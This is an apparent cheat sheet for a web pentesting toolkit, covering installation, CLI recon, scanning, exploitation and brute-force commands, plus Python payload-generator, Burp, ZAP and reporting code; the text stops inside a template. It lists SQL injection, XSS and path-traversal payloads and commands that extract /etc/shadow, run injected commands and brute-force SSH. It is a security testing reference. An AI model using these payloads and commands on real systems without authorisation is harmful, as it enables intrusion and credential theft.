Appearance
Pegasus-Pentest-Arsenal Cheat Sheet
Overview
Pegasus-Pentest-Arsenal is a comprehensive web security testing toolkit designed to streamline and automate various aspects of web application penetration testing. Developed as an all-in-one solution for security professionals, this arsenal combines multiple security testing tools and methodologies into a unified platform that simplifies the process of identifying and exploiting web application vulnerabilities. The toolkit is particularly valuable for penetration testers who need to quickly assess web applications across different technologies and frameworks.
The arsenal distinguishes itself through its modular architecture and extensive automation capabilities. Rather than requiring security professionals to manually configure and execute dozens of different tools, Pegasus-Pentest-Arsenal provides a streamlined interface that orchestrates various security testing activities. The platform includes automated reconnaissance, vulnerability scanning, exploitation modules, and reporting capabilities, making it suitable for both quick security assessments and comprehensive penetration testing engagements.
The toolkit incorporates industry-standard security testing methodologies and integrates with popular security tools to provide comprehensive coverage of web application attack vectors. It supports testing for OWASP Top 10 vulnerabilities, advanced injection attacks, authentication bypasses, session management flaws, and business logic vulnerabilities. The platform's automation capabilities significantly reduce the time required for routine testing tasks while maintaining the thoroughness required for professional security assessments.
Pegasus-Pentest-Arsenal is designed with both novice and experienced penetration testers in mind. The platform provides guided workflows for beginners while offering advanced customization options for experienced professionals. Its reporting capabilities generate professional-grade documentation suitable for client deliverables, compliance requirements, and internal security assessments.
Installation
Docker Installation (Recommended)
bash
# Clone Pegasus-Pentest-Arsenal repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Build Docker image
docker build -t pegasus-arsenal .
# Run Pegasus Arsenal container
docker run -d -p 8080:8080 -p 8443:8443 --name pegasus-arsenal pegasus-arsenal
# Run with persistent data
docker run -d -p 8080:8080 -p 8443:8443 \
-v pegasus_data:/app/data \
-v pegasus_reports:/app/reports \
--name pegasus-arsenal pegasus-arsenal
# Access Pegasus Arsenal
# Web interface: http://localhost:8080
# HTTPS interface: https://localhost:8443
# Stop container
docker stop pegasus-arsenal
# Remove container
docker rm pegasus-arsenalDocker Compose Installation
yaml
# Create docker-compose.yml
cat << 'EOF' > docker-compose.yml
version: '3.8'
services:
pegasus-arsenal:
build: .
container_name: pegasus-arsenal
ports:
- "8080:8080"
- "8443:8443"
- "1337:1337" # Additional service port
volumes:
- pegasus_data:/app/data
- pegasus_reports:/app/reports
- pegasus_wordlists:/app/wordlists
- ./custom_modules:/app/custom_modules
environment:
- PEGASUS_MODE=production
- PEGASUS_DEBUG=false
- PEGASUS_API_KEY=your_api_key_here
restart: unless-stopped
networks:
- pegasus_network
pegasus-db:
image: postgres:13
container_name: pegasus-db
environment:
- POSTGRES_DB=pegasus
- POSTGRES_USER=pegasus
- POSTGRES_PASSWORD=pegasus_password
volumes:
- pegasus_db_data:/var/lib/postgresql/data
networks:
- pegasus_network
volumes:
pegasus_data:
pegasus_reports:
pegasus_wordlists:
pegasus_db_data:
networks:
pegasus_network:
driver: bridge
EOF
# Start Pegasus Arsenal
docker-compose up -d
# View logs
docker-compose logs -f pegasus-arsenal
# Stop services
docker-compose down
# Stop and remove volumes
docker-compose down -vManual Installation on Ubuntu/Debian
bash
# Update system
sudo apt update && sudo apt upgrade -y
# Install dependencies
sudo apt install -y python3 python3-pip python3-venv git curl wget \
nmap sqlmap nikto dirb gobuster wfuzz hydra john \
metasploit-framework burpsuite zaproxy
# Install Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_16.x | sudo -E bash -
sudo apt install -y nodejs
# Clone repository
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Create virtual environment
python3 -m venv venv
source venv/bin/activate
# Install Python dependencies
pip install -r requirements.txt
# Install Node.js dependencies
npm install
# Configure database
sudo apt install postgresql postgresql-contrib
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
# Initialize database
python3 manage.py migrate
# Create superuser
python3 manage.py createsuperuser
# Start Pegasus Arsenal
python3 manage.py runserver 0.0.0.0:8080Installation on CentOS/RHEL
bash
# Install EPEL repository
sudo yum install epel-release -y
# Install dependencies
sudo yum groupinstall "Development Tools" -y
sudo yum install python3 python3-pip git curl wget \
nmap sqlmap nikto dirb hydra john -y
# Install additional security tools
sudo yum install snapd -y
sudo systemctl enable --now snapd.socket
sudo snap install burpsuite-community-edition
# Clone and setup
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git
cd pegasus-pentest-arsenal
# Setup Python environment
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install PostgreSQL
sudo yum install postgresql postgresql-server postgresql-contrib -y
sudo postgresql-setup initdb
sudo systemctl start postgresql
sudo systemctl enable postgresql
# Configure database
sudo -u postgres createdb pegasus
sudo -u postgres createuser pegasus
sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
# Start application
python3 manage.py runserver 0.0.0.0:8080Kubernetes Deployment
yaml
# Create pegasus-deployment.yaml
cat << 'EOF' > pegasus-deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-arsenal
labels:
app: pegasus-arsenal
spec:
replicas: 2
selector:
matchLabels:
app: pegasus-arsenal
template:
metadata:
labels:
app: pegasus-arsenal
spec:
containers:
- name: pegasus-arsenal
image: pegasus-arsenal:latest
ports:
- containerPort: 8080
- containerPort: 8443
env:
- name: PEGASUS_MODE
value: "production"
- name: DATABASE_URL
value: "postgresql://pegasus:password@pegasus-db:5432/pegasus"
volumeMounts:
- name: pegasus-data
mountPath: /app/data
- name: pegasus-reports
mountPath: /app/reports
volumes:
- name: pegasus-data
persistentVolumeClaim:
claimName: pegasus-data-pvc
- name: pegasus-reports
persistentVolumeClaim:
claimName: pegasus-reports-pvc
---
apiVersion: v1
kind: Service
metadata:
name: pegasus-arsenal-service
spec:
selector:
app: pegasus-arsenal
ports:
- name: http
port: 8080
targetPort: 8080
- name: https
port: 8443
targetPort: 8443
type: LoadBalancer
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: pegasus-db
spec:
replicas: 1
selector:
matchLabels:
app: pegasus-db
template:
metadata:
labels:
app: pegasus-db
spec:
containers:
- name: postgres
image: postgres:13
env:
- name: POSTGRES_DB
value: "pegasus"
- name: POSTGRES_USER
value: "pegasus"
- name: POSTGRES_PASSWORD
value: "password"
volumeMounts:
- name: postgres-data
mountPath: /var/lib/postgresql/data
volumes:
- name: postgres-data
persistentVolumeClaim:
claimName: postgres-data-pvc
---
apiVersion: v1
kind: Service
metadata:
name: pegasus-db
spec:
selector:
app: pegasus-db
ports:
- port: 5432
targetPort: 5432
EOF
# Deploy to Kubernetes
kubectl apply -f pegasus-deployment.yaml
# Check deployment status
kubectl get pods
kubectl get services
# Access Pegasus Arsenal
kubectl port-forward service/pegasus-arsenal-service 8080:8080Initial Configuration
First-Time Setup
bash
# Access Pegasus Arsenal web interface
# Navigate to http://localhost:8080
# Initial configuration wizard
# 1. Set admin credentials
# 2. Configure database connection
# 3. Set API keys for external services
# 4. Configure tool paths
# 5. Set up reporting preferences
# Command-line configuration
python3 manage.py configure --interactive
# Non-interactive configuration
python3 manage.py configure \
--admin-user admin \
--admin-password secure_password \
--database-url postgresql://pegasus:password@localhost:5432/pegasus \
--api-keys-file api_keys.jsonAPI Keys Configuration
bash
# Create API keys configuration file
cat << 'EOF' > api_keys.json
{
"virustotal": "your_virustotal_api_key",
"shodan": "your_shodan_api_key",
"censys": "your_censys_api_key",
"securitytrails": "your_securitytrails_api_key",
"hunter": "your_hunter_api_key",
"dehashed": "your_dehashed_api_key",
"hibp": "your_hibp_api_key",
"whoisxml": "your_whoisxml_api_key"
}
EOF
# Load API keys
python3 manage.py load_api_keys --file api_keys.json
# Test API connectivity
python3 manage.py test_apis
# Update individual API key
python3 manage.py set_api_key --service virustotal --key your_new_keyTool Configuration
bash
# Configure external tool paths
cat << 'EOF' > tool_config.json
{
"nmap": "/usr/bin/nmap",
"sqlmap": "/usr/bin/sqlmap",
"nikto": "/usr/bin/nikto",
"dirb": "/usr/bin/dirb",
"gobuster": "/usr/bin/gobuster",
"wfuzz": "/usr/bin/wfuzz",
"hydra": "/usr/bin/hydra",
"john": "/usr/bin/john",
"hashcat": "/usr/bin/hashcat",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"zaproxy": "/usr/bin/zaproxy"
}
EOF
# Load tool configuration
python3 manage.py configure_tools --file tool_config.json
# Verify tool installation
python3 manage.py verify_tools
# Update tool paths
python3 manage.py update_tool_path --tool nmap --path /opt/nmap/bin/nmapCore Modules and Features
Reconnaissance Module
bash
# Passive reconnaissance
pegasus-cli recon passive --target example.com
# Active reconnaissance
pegasus-cli recon active --target example.com --deep
# Subdomain enumeration
pegasus-cli recon subdomains --target example.com \
--wordlist /app/wordlists/subdomains.txt \
--dns-bruteforce \
--certificate-transparency
# Port scanning
pegasus-cli recon ports --target example.com \
--ports 1-65535 \
--service-detection \
--os-detection
# Technology stack identification
pegasus-cli recon tech --target example.com \
--fingerprint-cms \
--identify-frameworks \
--detect-waf
# OSINT gathering
pegasus-cli recon osint --target example.com \
--social-media \
--email-harvesting \
--leaked-credentialsVulnerability Scanning Module
bash
# Comprehensive vulnerability scan
pegasus-cli scan vuln --target http://example.com \
--scan-type comprehensive \
--include-owasp-top10
# Specific vulnerability types
pegasus-cli scan vuln --target http://example.com \
--scan-types sqli,xss,csrf,lfi,rfi
# Authenticated scanning
pegasus-cli scan vuln --target http://example.com \
--auth-type form \
--username admin \
--password password \
--login-url /login
# API vulnerability scanning
pegasus-cli scan api --target http://api.example.com \
--swagger-url /swagger.json \
--test-authentication \
--test-authorization
# SSL/TLS security assessment
pegasus-cli scan ssl --target example.com \
--check-certificates \
--test-ciphers \
--check-vulnerabilities
# Web application firewall detection
pegasus-cli scan waf --target http://example.com \
--detection-methods all \
--bypass-attemptsExploitation Module
bash
# SQL injection exploitation
pegasus-cli exploit sqli --target http://example.com/page.php?id=1 \
--technique union \
--dump-database \
--extract-passwords
# Cross-site scripting exploitation
pegasus-cli exploit xss --target http://example.com/search \
--parameter q \
--payload-type reflected \
--generate-poc
# File inclusion exploitation
pegasus-cli exploit lfi --target http://example.com/page.php?file=index \
--technique traversal \
--extract-files /etc/passwd,/etc/shadow
# Command injection exploitation
pegasus-cli exploit cmdi --target http://example.com/ping.php \
--parameter host \
--technique blind \
--execute-commands
# Authentication bypass
pegasus-cli exploit auth --target http://example.com/login \
--technique sqli \
--username-field user \
--password-field pass
# Session hijacking
pegasus-cli exploit session --target http://example.com \
--technique prediction \
--cookie-name PHPSESSIDBrute Force Module
bash
# Login brute force
pegasus-cli bruteforce login --target http://example.com/login \
--username-list /app/wordlists/usernames.txt \
--password-list /app/wordlists/passwords.txt \
--threads 10
# Directory brute force
pegasus-cli bruteforce dirs --target http://example.com \
--wordlist /app/wordlists/directories.txt \
--extensions php,asp,aspx,jsp \
--recursive
# Subdomain brute force
pegasus-cli bruteforce subdomains --target example.com \
--wordlist /app/wordlists/subdomains.txt \
--resolver 8.8.8.8 \
--threads 50
# Parameter brute force
pegasus-cli bruteforce params --target http://example.com/page.php \
--wordlist /app/wordlists/parameters.txt \
--method GET,POST
# Hash cracking
pegasus-cli bruteforce hash --hash-file hashes.txt \
--hash-type md5 \
--wordlist /app/wordlists/rockyou.txt \
--rules best64
# SSH brute force
pegasus-cli bruteforce ssh --target 192.168.1.100 \
--username-list users.txt \
--password-list passwords.txt \
--threads 5Advanced Testing Techniques
Custom Payload Development
python
#!/usr/bin/env python3
# Custom payload generator for Pegasus Arsenal
import json
import base64
from urllib.parse import quote
class PegasusPayloadGenerator:
def __init__(self):
self.payloads = {
'sqli': [],
'xss': [],
'lfi': [],
'cmdi': [],
'xxe': []
}
def generate_sqli_payloads(self, target_db='mysql'):
"""Generate SQL injection payloads"""
base_payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM information_schema.tables)>0 --"
]
if target_db == 'mysql':
base_payloads.extend([
"' UNION SELECT user(), database() --",
"' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
])
elif target_db == 'postgresql':
base_payloads.extend([
"' UNION SELECT current_user, current_database() --",
"' AND (SELECT version()) LIKE '%PostgreSQL%' --"
])
self.payloads['sqli'] = base_payloads
return base_payloads
def generate_xss_payloads(self, context='html'):
"""Generate XSS payloads for different contexts"""
html_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe src=javascript:alert('XSS')>"
]
js_payloads = [
"';alert('XSS');//",
"\";alert('XSS');//",
"'-alert('XSS')-'",
"\"-alert('XSS')-\""
]
attr_payloads = [
"\" onmouseover=alert('XSS') \"",
"' onmouseover=alert('XSS') '",
"javascript:alert('XSS')"
]
if context == 'html':
self.payloads['xss'] = html_payloads
elif context == 'javascript':
self.payloads['xss'] = js_payloads
elif context == 'attribute':
self.payloads['xss'] = attr_payloads
else:
self.payloads['xss'] = html_payloads + js_payloads + attr_payloads
return self.payloads['xss']
def generate_lfi_payloads(self, os_type='linux'):
"""Generate Local File Inclusion payloads"""
linux_payloads = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"..%252f..%252f..%252fetc%252fpasswd",
"/etc/passwd%00",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
windows_payloads = [
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....\\\\....\\\\....\\\\windows\\\\win.ini",
"..%255c..%255c..%255cwindows%255cwin.ini",
"C:\\windows\\win.ini%00"
]
if os_type == 'linux':
self.payloads['lfi'] = linux_payloads
elif os_type == 'windows':
self.payloads['lfi'] = windows_payloads
else:
self.payloads['lfi'] = linux_payloads + windows_payloads
return self.payloads['lfi']
def encode_payloads(self, payloads, encoding='url'):
"""Encode payloads for bypass attempts"""
encoded = []
for payload in payloads:
if encoding == 'url':
encoded.append(quote(payload))
elif encoding == 'base64':
encoded.append(base64.b64encode(payload.encode()).decode())
elif encoding == 'html':
encoded.append(''.join(f'&#{ord(c)};' for c in payload))
return encoded
def export_payloads(self, filename='custom_payloads.json'):
"""Export payloads to JSON file"""
with open(filename, 'w') as f:
json.dump(self.payloads, f, indent=2)
print(f"Payloads exported to {filename}")
# Usage example
if __name__ == "__main__":
generator = PegasusPayloadGenerator()
# Generate payloads
sqli_payloads = generator.generate_sqli_payloads('mysql')
xss_payloads = generator.generate_xss_payloads('html')
lfi_payloads = generator.generate_lfi_payloads('linux')
# Encode for bypass
encoded_sqli = generator.encode_payloads(sqli_payloads, 'url')
# Export all payloads
generator.export_payloads()Automated Testing Workflows
bash
#!/bin/bash
# Pegasus Arsenal automated testing workflow
TARGET="$1"
OUTPUT_DIR="pegasus_results_$(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET" ]; then
echo "Usage: $0 <target>"
exit 1
fi
echo "[*] Starting Pegasus Arsenal automated testing for $TARGET"
mkdir -p "$OUTPUT_DIR"
# Phase 1: Reconnaissance
echo "[*] Phase 1: Reconnaissance"
pegasus-cli recon passive --target "$TARGET" --output "$OUTPUT_DIR/recon_passive.json"
pegasus-cli recon active --target "$TARGET" --output "$OUTPUT_DIR/recon_active.json"
pegasus-cli recon subdomains --target "$TARGET" --output "$OUTPUT_DIR/subdomains.json"
# Phase 2: Port Scanning
echo "[*] Phase 2: Port Scanning"
pegasus-cli recon ports --target "$TARGET" --ports 1-65535 --output "$OUTPUT_DIR/ports.json"
# Phase 3: Technology Detection
echo "[*] Phase 3: Technology Detection"
pegasus-cli recon tech --target "$TARGET" --output "$OUTPUT_DIR/technology.json"
# Phase 4: Vulnerability Scanning
echo "[*] Phase 4: Vulnerability Scanning"
pegasus-cli scan vuln --target "http://$TARGET" --scan-type comprehensive --output "$OUTPUT_DIR/vulnerabilities.json"
# Phase 5: SSL/TLS Assessment
echo "[*] Phase 5: SSL/TLS Assessment"
pegasus-cli scan ssl --target "$TARGET" --output "$OUTPUT_DIR/ssl_assessment.json"
# Phase 6: Directory Brute Force
echo "[*] Phase 6: Directory Brute Force"
pegasus-cli bruteforce dirs --target "http://$TARGET" --output "$OUTPUT_DIR/directories.json"
# Phase 7: Exploitation (if vulnerabilities found)
echo "[*] Phase 7: Exploitation"
if grep -q "sql_injection" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit sqli --target "http://$TARGET" --auto-detect --output "$OUTPUT_DIR/sqli_exploitation.json"
fi
if grep -q "xss" "$OUTPUT_DIR/vulnerabilities.json"; then
pegasus-cli exploit xss --target "http://$TARGET" --auto-detect --output "$OUTPUT_DIR/xss_exploitation.json"
fi
# Phase 8: Report Generation
echo "[*] Phase 8: Report Generation"
pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format html --output "$OUTPUT_DIR/final_report.html"
pegasus-cli report generate --input-dir "$OUTPUT_DIR" --format pdf --output "$OUTPUT_DIR/final_report.pdf"
echo "[*] Testing complete. Results saved to $OUTPUT_DIR"
echo "[*] Open $OUTPUT_DIR/final_report.html to view the results"Custom Module Development
python
#!/usr/bin/env python3
# Custom Pegasus Arsenal module template
from pegasus.core.module import BaseModule
from pegasus.core.logger import get_logger
import requests
import json
class CustomWebTestModule(BaseModule):
"""Custom web application testing module"""
def __init__(self):
super().__init__()
self.name = "Custom Web Test"
self.description = "Custom web application security testing module"
self.version = "1.0.0"
self.author = "Security Researcher"
self.logger = get_logger(__name__)
# Module options
self.options = {
'target': {
'description': 'Target URL',
'required': True,
'default': ''
},
'timeout': {
'description': 'Request timeout in seconds',
'required': False,
'default': 10
},
'user_agent': {
'description': 'Custom User-Agent string',
'required': False,
'default': 'Pegasus-Arsenal/1.0'
}
}
def validate_options(self):
"""Validate module options"""
if not self.options['target']['value']:
raise ValueError("Target URL is required")
if not self.options['target']['value'].startswith(('http://', 'https://')):
raise ValueError("Target must be a valid HTTP/HTTPS URL")
def run(self):
"""Execute the module"""
self.logger.info(f"Starting custom web test for {self.options['target']['value']}")
try:
self.validate_options()
# Custom testing logic
results = self.perform_custom_tests()
# Process and return results
return self.format_results(results)
except Exception as e:
self.logger.error(f"Module execution failed: {e}")
return {'error': str(e)}
def perform_custom_tests(self):
"""Perform custom security tests"""
target = self.options['target']['value']
timeout = int(self.options['timeout']['value'])
user_agent = self.options['user_agent']['value']
headers = {'User-Agent': user_agent}
results = {
'target': target,
'tests': []
}
# Test 1: Check for sensitive files
sensitive_files = [
'/robots.txt',
'/.htaccess',
'/web.config',
'/backup.sql',
'/config.php.bak'
]
for file_path in sensitive_files:
test_url = target.rstrip('/') + file_path
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
test_result = {
'test_name': 'Sensitive File Check',
'url': test_url,
'status_code': response.status_code,
'vulnerable': response.status_code == 200,
'details': f"File {file_path} accessible" if response.status_code == 200 else None
}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for {test_url}: {e}")
# Test 2: Check for common vulnerabilities
vuln_tests = [
{
'name': 'XSS Test',
'payload': '<script>alert("XSS")</script>',
'parameter': 'q'
},
{
'name': 'SQL Injection Test',
'payload': "' OR '1'='1",
'parameter': 'id'
}
]
for test in vuln_tests:
test_url = f"{target}?{test['parameter']}={test['payload']}"
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
vulnerable = test['payload'] in response.text
test_result = {
'test_name': test['name'],
'url': test_url,
'vulnerable': vulnerable,
'payload': test['payload'],
'details': f"Payload reflected in response" if vulnerable else None
}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for {test_url}: {e}")
return results
def format_results(self, results):
"""Format results for output"""
formatted = {
'module': self.name,
'target': results['target'],
'timestamp': self.get_timestamp(),
'summary': {
'total_tests': len(results['tests']),
'vulnerabilities_found': sum(1 for test in results['tests'] if test.get('vulnerable', False))
},
'vulnerabilities': [test for test in results['tests'] if test.get('vulnerable', False)],
'all_tests': results['tests']
}
return formatted
# Register module with Pegasus Arsenal
def register_module():
return CustomWebTestModule()Integration with Security Tools
Burp Suite Integration
python
#!/usr/bin/env python3
# Pegasus Arsenal - Burp Suite integration
import requests
import json
import base64
class PegasusBurpIntegration:
def __init__(self, burp_api_url="http://localhost:1337", api_key=None):
self.burp_api_url = burp_api_url
self.api_key = api_key
self.session = requests.Session()
if api_key:
self.session.headers.update({'X-API-Key': api_key})
def start_scan(self, target_url, scan_type="crawl_and_audit"):
"""Start Burp Suite scan via API"""
scan_config = {
"scan_configurations": [
{
"name": scan_type,
"type": "NamedConfiguration"
}
],
"urls": [target_url]
}
response = self.session.post(
f"{self.burp_api_url}/v0.1/scan",
json=scan_config
)
if response.status_code == 201:
scan_id = response.headers.get('Location').split('/')[-1]
return scan_id
else:
raise Exception(f"Failed to start scan: {response.text}")
def get_scan_status(self, scan_id):
"""Get scan status"""
response = self.session.get(f"{self.burp_api_url}/v0.1/scan/{scan_id}")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan status: {response.text}")
def get_scan_issues(self, scan_id):
"""Get scan issues/vulnerabilities"""
response = self.session.get(f"{self.burp_api_url}/v0.1/scan/{scan_id}/issues")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan issues: {response.text}")
def export_scan_report(self, scan_id, report_format="HTML"):
"""Export scan report"""
export_config = {
"scan_id": scan_id,
"report_type": report_format
}
response = self.session.post(
f"{self.burp_api_url}/v0.1/scan/{scan_id}/report",
json=export_config
)
if response.status_code == 200:
return response.content
else:
raise Exception(f"Failed to export report: {response.text}")
# Integration with Pegasus Arsenal
def integrate_with_pegasus(target_url):
"""Integrate Burp Suite scan with Pegasus Arsenal"""
burp = PegasusBurpIntegration()
# Start scan
scan_id = burp.start_scan(target_url)
print(f"Started Burp Suite scan: {scan_id}")
# Monitor scan progress
while True:
status = burp.get_scan_status(scan_id)
if status['scan_status'] == 'succeeded':
print("Scan completed successfully")
break
elif status['scan_status'] == 'failed':
print("Scan failed")
break
else:
print(f"Scan in progress: {status['scan_metrics']['crawl_requests_made']} requests made")
time.sleep(30)
# Get issues
issues = burp.get_scan_issues(scan_id)
# Export report
report = burp.export_scan_report(scan_id, "HTML")
with open(f"burp_report_{scan_id}.html", "wb") as f:
f.write(report)
return issuesOWASP ZAP Integration
python
#!/usr/bin/env python3
# Pegasus Arsenal - OWASP ZAP integration
from zapv2 import ZAPv2
import time
import json
class PegasusZAPIntegration:
def __init__(self, zap_proxy="http://localhost:8080"):
self.zap = ZAPv2(proxies={'http': zap_proxy, 'https': zap_proxy})
def spider_target(self, target_url):
"""Spider target application"""
print(f"Starting spider scan for {target_url}")
scan_id = self.zap.spider.scan(target_url)
# Wait for spider to complete
while int(self.zap.spider.status(scan_id)) < 100:
print(f"Spider progress: {self.zap.spider.status(scan_id)}%")
time.sleep(5)
print("Spider scan completed")
return self.zap.spider.results(scan_id)
def active_scan(self, target_url):
"""Perform active security scan"""
print(f"Starting active scan for {target_url}")
scan_id = self.zap.ascan.scan(target_url)
# Wait for active scan to complete
while int(self.zap.ascan.status(scan_id)) < 100:
print(f"Active scan progress: {self.zap.ascan.status(scan_id)}%")
time.sleep(10)
print("Active scan completed")
return scan_id
def get_alerts(self, baseurl=None):
"""Get security alerts"""
return self.zap.core.alerts(baseurl)
def generate_report(self, format_type="HTML"):
"""Generate security report"""
if format_type.upper() == "HTML":
return self.zap.core.htmlreport()
elif format_type.upper() == "XML":
return self.zap.core.xmlreport()
elif format_type.upper() == "JSON":
return self.zap.core.jsonreport()
else:
raise ValueError("Unsupported report format")
def comprehensive_scan(self, target_url):
"""Perform comprehensive security assessment"""
results = {
'target': target_url,
'spider_results': [],
'alerts': [],
'scan_summary': {}
}
# Spider the application
spider_results = self.spider_target(target_url)
results['spider_results'] = spider_results
# Perform active scan
scan_id = self.active_scan(target_url)
# Get alerts
alerts = self.get_alerts(target_url)
results['alerts'] = alerts
# Generate summary
results['scan_summary'] = {
'total_urls_found': len(spider_results),
'total_alerts': len(alerts),
'high_risk_alerts': len([a for a in alerts if a['risk'] == 'High']),
'medium_risk_alerts': len([a for a in alerts if a['risk'] == 'Medium']),
'low_risk_alerts': len([a for a in alerts if a['risk'] == 'Low'])
}
return results
# Integration function
def run_zap_scan_for_pegasus(target_url):
"""Run ZAP scan and integrate with Pegasus Arsenal"""
zap_integration = PegasusZAPIntegration()
# Perform comprehensive scan
results = zap_integration.comprehensive_scan(target_url)
# Generate reports
html_report = zap_integration.generate_report("HTML")
json_report = zap_integration.generate_report("JSON")
# Save reports
with open(f"zap_report_{target_url.replace('://', '_').replace('/', '_')}.html", "w") as f:
f.write(html_report)
with open(f"zap_results_{target_url.replace('://', '_').replace('/', '_')}.json", "w") as f:
f.write(json_report)
return resultsReporting and Documentation
Automated Report Generation
python
#!/usr/bin/env python3
# Pegasus Arsenal automated report generator
import json
import datetime
from jinja2 import Template
import pdfkit
class PegasusReportGenerator:
def __init__(self):
self.report_data = {}
self.templates = {
'executive_summary': self.get_executive_template(),
'technical_details': self.get_technical_template(),
'recommendations': self.get_recommendations_template()
}
def load_scan_results(self, results_file):
"""Load scan results from JSON file"""
with open(results_file, 'r') as f:
self.report_data = json.load(f)
def generate_executive_summary(self):
"""Generate executive summary"""
template = Template(self.templates['executive_summary'])
# Calculate risk metrics
total_vulns = len(self.report_data.get('vulnerabilities', []))
high_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'High'])
medium_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Medium'])
low_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Low'])
summary_data = {
'target': self.report_data.get('target', 'Unknown'),
'scan_date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'total_vulnerabilities': total_vulns,
'high_risk_count': high_risk,
'medium_risk_count': medium_risk,
'low_risk_count': low_risk,
'risk_score': self.calculate_risk_score(high_risk, medium_risk, low_risk)
}
return template.render(**summary_data)
def generate_technical_details(self):
"""Generate technical details section"""
template = Template(self.templates['technical_details'])
return template.render(
vulnerabilities=self.report_data.get('vulnerabilities', []),
scan_details=self.report_data.get('scan_details', {}),
target_info=self.report_data.get('target_info', {})
)
def generate_recommendations(self):
"""Generate recommendations section"""
template = Template(self.templates['recommendations'])
# Generate recommendations based on vulnerabilities found
recommendations = self.generate_vuln_recommendations()
return template.render(recommendations=recommendations)
def generate_full_report(self, output_format='html'):
"""Generate complete security assessment report"""
report_sections = {
'executive_summary': self.generate_executive_summary(),
'technical_details': self.generate_technical_details(),
'recommendations': self.generate_recommendations()
}
full_report_template = """
<!DOCTYPE html>
<html>
<head>
<title>Pegasus Arsenal Security Assessment Report</title>
<style>
body { font-family: Arial, sans-serif; margin: 40px; }
.header { text-align: center; border-bottom: 2px solid #333; padding-bottom: 20px; }
.section { margin: 30px 0; }
.vulnerability { border: 1px solid #ddd; padding: 15px; margin: 10px 0; }
.high-risk { border-left: 5px solid #d32f2f; }
.medium-risk { border-left: 5px solid #f57c00; }
.low-risk { border-left: 5px solid #388e3c; }
.recommendation { background: #f5f5f5; padding: 15px; margin: 10px 0; }
</style>
</head>
<body>
<div class="header">
<h1>Security Assessment Report</h1>
<h2>Generated by Pegasus Arsenal</h2>
</div>
<div class="section">
<h2>Executive Summary</h2>
{{ executive_summary }}
</div>
<div class="section">
<h2>Technical Details</h2>
{{ technical_details }}
</div>
<div class="section">
<h2>Recommendations</h2>
{{ recommendations }}
</div>
</body>
</html>
"""
template = Template(full_report_template)
html_report = template.render(**report_sections)
if output_format.lower() == 'html':
return html_report
elif output_format.lower() == 'pdf':
return pdfkit.from_string(html_report, False)
else:
raise ValueError("Unsupported output format")
def calculate_risk_score(self, high, medium, low):
"""Calculate overall risk score"""
score = (high * 10) + (medium * 5) + (low * 1)
if score >= 50:
return "Critical"
elif score >= 25:
return "High"
elif score >= 10:
return "Medium"
else:
return "Low"
def generate_vuln_recommendations(self):
"""Generate vulnerability-specific recommendations"""
recommendations = []
vuln_types = set(v.get('type', 'Unknown') for v in self.report_data.get('vulnerabilities', []))
recommendation_map = {
'SQL Injection': {
'title': 'SQL Injection Prevention',
'description': 'Implement parameterized queries and input validation',
'priority': 'High',
'effort': 'Medium'
},
'Cross-Site Scripting': {
'title': 'XSS Prevention',
'description': 'Implement output encoding and Content Security Policy',
'priority': 'High',
'effort': 'Medium'
},
'Cross-Site Request Forgery': {
'title': 'CSRF Protection',
'description': 'Implement CSRF tokens and SameSite cookies',
'priority': 'Medium',
'effort': 'Low'
}
}
for vuln_type in vuln_types:
if vuln_type in recommendation_map:
recommendations.append(recommendation_map[vuln_type])
return recommendations
def get_executive_template(self):
return """
<h3>Assessment Overview</h3>
<p>This security assessment was conducted on <strong>{{ target }}</strong> on {{ scan_date }}.</p>
<h4>Key Findings</h4>
<ul>
<li>Total Vulnerabilities Found: {{ total_vulnerabilities }}</li>
<li>High Risk: {{ high_risk_count }}</li>
<li>Medium Risk: {{ medium_risk_count }}</li>
<li>Low Risk: {{ low_risk_count }}</li>
<li>Overall Risk Score: {{ risk_score }}</li>
</ul>
"""
def get_technical_template(self):
return """
<h3>Vulnerability Details</h3>
{% for vuln in vulnerabilities %}
<div class="vulnerability {{ vuln.severity|lower }}-risk">
<h4>{{ vuln.name }}</h4>
<p><strong>Severity:</strong> {{ vuln.severity }}</p>
<p><strong>Description:</strong> {{ vuln.description }}</p>
<p><strong>Location:</strong> {{ vuln.url }}</p>
{% if vuln.proof_of_concept %}
<p><strong>Proof of Concept:</strong></p>
<pre>{{ vuln.proof_of_concept }}</pre>
{% endif %}
</div>
{% endfor %}
"""
def get_recommendations_template(self):
return """
<h3>Security Recommendations</h3>
{% for rec in recommendations %}
<div class="recommendation">
<h4>{{ rec.title }}</h4>
